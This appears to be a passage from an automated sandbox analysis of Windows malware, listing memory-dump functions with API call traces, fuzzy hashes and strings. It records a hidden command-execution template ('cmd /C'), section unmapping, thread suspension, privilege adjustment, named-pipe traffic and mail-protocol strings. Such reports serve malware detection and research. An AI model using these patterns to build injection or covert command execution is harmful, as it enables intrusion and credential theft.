    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7341, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 76 Total matches: 75stringfilememory
Similarity
  • Total matches: 75
  • API ID: GetLastError$CloseHandleCreateFileCreateFileMappingGetFileSizeGetTickCountHeapFreelstrcpylstrlen
  • String ID: Local\
  • API String ID: 100657750-422136742
  • Opcode ID: f69422c415cb778fefbc06e8825fe91035b8cc03ac1a89af78bf0cef88205365
  • Instruction ID: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
  • Opcode Fuzzy Hash: 99F02E34B1854287E12374A1016077FDA04E7F20C4D8C7767ED453950A6F0278F7661B
  • Instruction Fuzzy Hash: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
APIs
  • GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
  • CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
    • Part of subcall function 001D937A: lstrlen.KERNEL32(00000000,00000000,?,00000027,?,001EB068,00000000), ref: 001D93B0
    • Part of subcall function 001D937A: lstrcpy.KERNEL32(00000000,00000000), ref: 001D93D4
    • Part of subcall function 001D937A: lstrcat.KERNEL32(00000000,00000000), ref: 001D93DC
  • GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
  • CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
  • lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
  • lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
  • HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
  • CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C178D, Relevance: 18.1, APIs: 12, Instructions: 117 Total matches: 53registrythreadsleep
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1A08, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122 Total matches: 58memorythreadstring
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB47B, Relevance: 16.7, APIs: 11, Instructions: 187 Total matches: 59synchronizationstring
Similarity
  • Total matches: 59
  • API ID: GetLastError$WaitForSingleObject$ReleaseMutexlstrcpynmemcpymemset
  • String ID:
  • API String ID: 1576942631-0
  • Opcode ID: bbb80d9d18486b754104cd36c0130e3b39926c5d582aef500eb7a1e8a66222a2
  • Instruction ID: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
  • Opcode Fuzzy Hash: 4A217F33157A22D745163840C0507BEF482FB825E694CB711FE21722DE4A8197F6AFDD
  • Instruction Fuzzy Hash: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
APIs
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB4AE
  • memcpy.NTDLL(?,?,00000010), ref: 001DB4D1
  • memset.NTDLL ref: 001DB51D
  • lstrcpyn.KERNEL32(?,?,00000034), ref: 001DB531
  • GetLastError.KERNEL32 ref: 001DB55F
  • GetLastError.KERNEL32 ref: 001DB5A2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB5C1
  • WaitForSingleObject.KERNEL32(?,000927C0), ref: 001DB5FB
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001DB609
    • Part of subcall function 001DB350: memset.NTDLL ref: 001DB398
    • Part of subcall function 001DB350: QueueUserWorkItem.KERNEL32(001DAFC4,?,00000010), ref: 001DB439
    • Part of subcall function 001DB350: GetLastError.KERNEL32 ref: 001DB443
  • GetLastError.KERNEL32 ref: 001DB67E
  • ReleaseMutex.KERNEL32(?), ref: 001DB690
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1586, Relevance: 16.6, APIs: 11, Instructions: 78 Total matches: 43memoryfile
Similarity
  • Total matches: 43
  • API ID: GetLastError$CloseHandleCreateFileGetModuleHandleGetWindowsDirectoryHeapFreeRtlAllocateHeapStrChrWriteFilewsprintf
  • String ID:
  • API String ID: 2627060994-0
  • Opcode ID: db8d6b5184187aba615ed9859a1217546e47d51c2a19850b1dde47917d77b9bd
  • Instruction ID: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
  • Opcode Fuzzy Hash: 00E05538564C02C3C4279AA888803BEDA41B3801C1E8E0212FA002A5BAAB0323C88F63
  • Instruction Fuzzy Hash: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
  • StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
  • wsprintfA.USER32 ref: 001C15D0
  • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
  • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
  • WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
  • GetLastError.KERNEL32 ref: 001C1615
  • CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
  • GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7422, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 102 Total matches: 8processstring
Similarity
  • Total matches: 8
  • API ID: CreateProcessGetExitCodeProcessGetLastErrorWaitForMultipleObjectslstrlenmemsetwcstombs
  • String ID: D$cmd /C "%s> %s1"
  • API String ID: 1537746708-2226621151
  • Opcode ID: 8f43a44b104833d0f96806934345d3a8753fb5f9a1b6580f8a9b41b9e07b006e
  • Instruction ID: 189f0c3c70cc7b6004f2ba7acf1b9f38675443b636e617586de16067a78319dd
  • Opcode Fuzzy Hash: 3EF0C02508CBD197D4C33468270174BEA16AF211D2C4D6B91A6806A1885F0075D2575B
  • Instruction Fuzzy Hash: 189f0c3c70cc7b6004f2ba7acf1b9f38675443b636e617586de16067a78319dd
APIs
  • memset.NTDLL ref: 001C743A
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
  • wcstombs.NTDLL ref: 001C747D
  • CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
  • GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
  • GetLastError.KERNEL32 ref: 001C7507
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C20A7, Relevance: 15.2, APIs: 10, Instructions: 171 Total matches: 60memorystringthread
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBB92, Relevance: 15.1, APIs: 10, Instructions: 109 Total matches: 83pipesynchronization
Similarity
  • Total matches: 83
  • API ID: CloseHandleGetLastError$ConnectNamedPipeCreateEventDisconnectNamedPipeFlushFileBuffersWaitForMultipleObjectsWaitForSingleObject
  • String ID:
  • API String ID: 4178450735-0
  • Opcode ID: fea2056c6ced76e25bc66d29ae2c0ef00b9ab400e991bc076a25110f2a978033
  • Instruction ID: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
  • Opcode Fuzzy Hash: 34F07B324973A09BC12724748146BBA7A46FF612E7D8C7302ECB0B518E1F05A6F65369
  • Instruction Fuzzy Hash: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
APIs
  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001CBBD2
  • ConnectNamedPipe.KERNEL32(?,?), ref: 001CBC02
  • GetLastError.KERNEL32 ref: 001CBC0C
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CBC30
    • Part of subcall function 001CB978: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
    • Part of subcall function 001CB978: WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
    • Part of subcall function 001CB978: ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CB9DD
    • Part of subcall function 001CB978: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
    • Part of subcall function 001CB978: GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
    • Part of subcall function 001CB978: CancelIo.KERNEL32(?), ref: 001CBA27
    • Part of subcall function 001CB978: CloseHandle.KERNEL32(?), ref: 001CBA37
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CBA3F
  • CloseHandle.KERNEL32(?), ref: 001CBC9E
    • Part of subcall function 001CBB13: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CBB31
    • Part of subcall function 001CBB13: HeapFree.KERNEL32(00000000,00000000), ref: 001CBB84
  • FlushFileBuffers.KERNEL32(?), ref: 001CBC73
  • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 001CBC7C
  • WaitForSingleObject.KERNEL32(001EB094,00000000), ref: 001CBC89
  • GetLastError.KERNEL32 ref: 001CBCAB
  • CloseHandle.KERNEL32(?), ref: 001CBCB8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB838, Relevance: 15.1, APIs: 10, Instructions: 64 Total matches: 62sleepsynchronization
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF75B, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 172 Total matches: 23string
Similarity
  • Total matches: 23
  • API ID: LocalFreelstrcatlstrcpymemcpy
  • String ID: IMAP$P$POP3$SMTP
  • API String ID: 2001391702-3667654339
  • Opcode ID: 43434d26df3a4f5d7c34ecf30ecc38ca90c9099c92fdaea40e4787011e532f06
  • Instruction ID: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
  • Opcode Fuzzy Hash: 3911AF310449E3F79AAB229950026AB81429F117E2E5C9B21ED7C785CF6F03B14B770D
  • Instruction Fuzzy Hash: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
APIs
  • lstrcpyW.KERNEL32(00000000,001ED5A0), ref: 001DF84B
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001DF853
  • memcpy.NTDLL(00000000,?,00000000,-00000002), ref: 001DF8F1
  • LocalFree.KERNEL32(?,-00000002), ref: 001DF908
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001D93F1: lstrlenW.KERNEL32(00000000,00000000,001EAC44), ref: 001D9401
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DAFC4, Relevance: 13.8, APIs: 9, Instructions: 278 Total matches: 59memorythread
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAC3A, Relevance: 13.6, APIs: 9, Instructions: 124 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
